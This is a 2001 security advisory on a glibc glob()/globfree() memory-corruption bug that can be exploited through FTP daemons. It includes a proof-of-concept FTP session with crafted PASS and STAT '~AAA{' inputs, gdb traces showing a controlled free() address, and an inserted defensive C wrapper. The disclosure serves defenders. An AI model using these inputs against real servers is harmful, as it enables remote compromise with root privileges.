[UNIX] Glibc Globing Issues (~AAA{ Trick)

From: support@securiteam.com
Date: 12/23/01


From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 23 Dec 2001 05:04:08 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Glibc Globing Issues (~AAA{ Trick)
------------------------------------------------------------------------

SUMMARY

Glibc contains a globbing error that may be remotely exploitable when glob
functions are used in software such as ftp daemons.

DETAILS

The glibc glob() function allows programs to search for path names
matching specific patterns according to the rules used by the shell. Glibc
also implements the globfree() function, which free()'s memory allocated
earlier by a glob() match. The glob function itself may encounter errors
when handling strings ending with the "{" (0x7b) character. This is due to
next_brace_sub(), which can cause glob to read memory pages it should not,
eventually causing the program to exit (normally with SEGV).

Note: The vulnerability described in CA-2001-33 in Washington
University's FTPd was not due to errors in glibc glob, but to their own
implementation of this function.

Previous discussions ruled this bug as not exploitable. This is not
entirely true. Global Intersec has since discovered a condition under
which the bug may be used to exploit this vulnerability.

This is dependent on the program in question using the globfree()
function, also defined in glibc glob.c (sysdeps/generic/glob.c). An
example of this would be the OpenBSD FTPd Linux port. By carefully
constructing user input to such daemons, it is possible to corrupt the memory
space of the process. Ultimately, the result of this would be the ability
to execute arbitrary commands with the privileges of the server process.
This is often root (uid 0).
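The two conditions described above (a pattern that ends inside an open brace group, and a globfree() call on a glob_t that glob() never populated) both have straightforward code-level mitigations. The following C wrapper is an added example, not glibc's or the ftpd's own code; the names balanced_braces, safe_glob and count_matches are hypothetical. It refuses unbalanced brace patterns before glob() sees them, and it zeroes the glob_t before every call so that globfree() can only ever see pointers that glob() itself stored there.

```c
#define _GNU_SOURCE
#include <glob.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if every unescaped '{' in pat is closed by a '}', else 0.
 * A pattern such as "~AAAA{" ends inside an open brace group; refusing it
 * here means glob()'s brace expansion never walks past the end of the
 * string. A backslash escapes the next character, as in the shell.
 * (Hypothetical helper, added for this example.) */
int balanced_braces(const char *pat)
{
    int depth = 0;
    for (const char *p = pat; *p != '\0'; p++) {
        if (*p == '\\') {
            if (p[1] == '\0')
                break;          /* trailing backslash: nothing left to escape */
            p++;                /* skip the escaped character */
        } else if (*p == '{') {
            depth++;
        } else if (*p == '}' && depth > 0) {
            depth--;
        }
    }
    return depth == 0;
}

/* Wrapper around glob(): zero the glob_t first so that, whatever glob()
 * does with the pattern, gl_pathv/gl_pathc never hold stack garbage.
 * Returns -1 if the pattern is refused, otherwise glob()'s own code. */
int safe_glob(const char *pattern, glob_t *g)
{
    memset(g, 0, sizeof *g);
    if (!balanced_braces(pattern))
        return -1;
    return glob(pattern, GLOB_BRACE, NULL, g);
}

/* Count matches for a pattern. Returns -1 for a refused pattern, 0 when
 * nothing matched or glob() failed, otherwise the match count.
 * globfree() runs on every path that reached glob(): because the struct
 * was zeroed, a no-match result leaves gl_pathv NULL and gl_pathc 0, so
 * globfree() frees nothing rather than whatever was on the stack. */
int count_matches(const char *pattern)
{
    glob_t g;
    int rc = safe_glob(pattern, &g);
    if (rc == -1)
        return -1;                  /* glob() never ran: nothing to free */
    int n = (rc == 0) ? (int)g.gl_pathc : 0;
    globfree(&g);
    return n;
}

int main(void)
{
    /* Constructed sample inputs: the advisory's trailing-brace shape, a
     * well-formed brace group, and a pattern that matches nothing. */
    const char *inputs[] = { "~AAAAAAAA{", "/dev/{null,zero}", "/no_such_dir_xyz/*" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-22s -> %d\n", inputs[i], count_matches(inputs[i]));
    return 0;
}
```

The memset is the part that matters for the globfree() path: an uninitialised glob_t on the stack is exactly what lets a previous command's bytes become the pointers that globfree() hands to free(). Rejecting the malformed pattern up front is belt-and-braces on top of that, and is cheap enough to apply to any user-supplied glob in a network daemon.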

Impact:
For this bug to be exploitable the attacker must be able to cause a daemon
to call glob matching functions via services which allow either
anonymous/public access or which may require authentication. This includes
ftp daemons.

Workaround:
The scope for your systems being targeted by this form of attack can be
reduced by disabling remotely accessible daemons that use the functions in
question. These include the OpenBSD FTPd Linux port. It is also suggested
that public access to such daemons be removed until vendor fixes have been
applied.

Proof of concept:
For the purposes of proving a concept, we will now refer to use of these
functions in the OpenBSD ftp daemon - ported to Linux by David Madore.

As we have recently seen in the Washington University ftp daemon, free()
based vulnerabilities are readily exploitable. In the case of the OpenBSD
ftpd we must ensure that globfree() is called to make any use of the glob
vulnerabilities.

Note: OpenBSD itself is not vulnerable to this form of attack due to the
way in which it handles memory pages.

By forcing globfree() to be called _before_ the next_brace_sub condition
occurs it is possible to control the address which is free()'d. In our
first example, we insert an invalid address onto the stack, causing the
program to SEGV.

 : 220 localhost FTP server (Version 6.5/OpenBSD, Linux port 0.3.3) ready.
 -> USER ftp
 : 331 Guest login ok, type your name as password.
 Sleeping for 10 seconds...
 -> PASS AAAAAAAAAAAAAAAAAAA\xef\xef\xbe\xad\xde # ( <19 Bytes> <Addr to write> <Glob char>)
 : 230 Guest login ok, access restrictions apply.
 -> STAT ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{

 #0 0x400f7968 in globfree () at ../sysdeps/generic/glob.c:1055
 #1 0x8051b0b in yyparse () at ftpcmd.y:1138
 #2 0x804b455 in main (argc=1094795585, argv=0xbffff864,
envp=0xbffff86c) at ftpd.c:715

Examination of the registers shows that we have successfully inserted the
intended address. As the address is not valid, the FTP daemon segfaults.

   <snip>
   esi 0xdeadbeef -559038737
   edi 0xdeadbeef -559038737
   </snip>

On giving the ftp daemon a valid address to free (in this case a pointer
to syslog()), the daemon will continue to free() the address we gave it,
where it again will segfault because the address we gave it is not a
valid malloc chunk.

 #0 0x400c6178 in free () at malloc.c:2952
 #1 0x400f7989 in globfree () at ../sysdeps/generic/glob.c:1055
 #2 0x8051b0b in yyparse () at ftpcmd.y:1138
 #3 0x804b455 in main (argc=1094795585, argv=0xbffff864,
envp=0xbffff86c) at ftpd.c:715

i.e. (SuSE glibc-2.2/sysdeps/generic/glob.c):
   glob.c:1097 if (pglob->gl_pathv[pglob->gl_offs + i] != NULL)
   glob.c:1098 free ((__ptr_t) pglob->gl_pathv[pglob->gl_offs + i]);
   glob.c:1099 free ((__ptr_t) pglob->gl_pathv);

Information on exploiting this form of vulnerability is available at
http://www.phrack.org/show.php?p=57&a=9

ADDITIONAL INFORMATION

The information has been provided by Tom Parker <tom@rooted.net>.
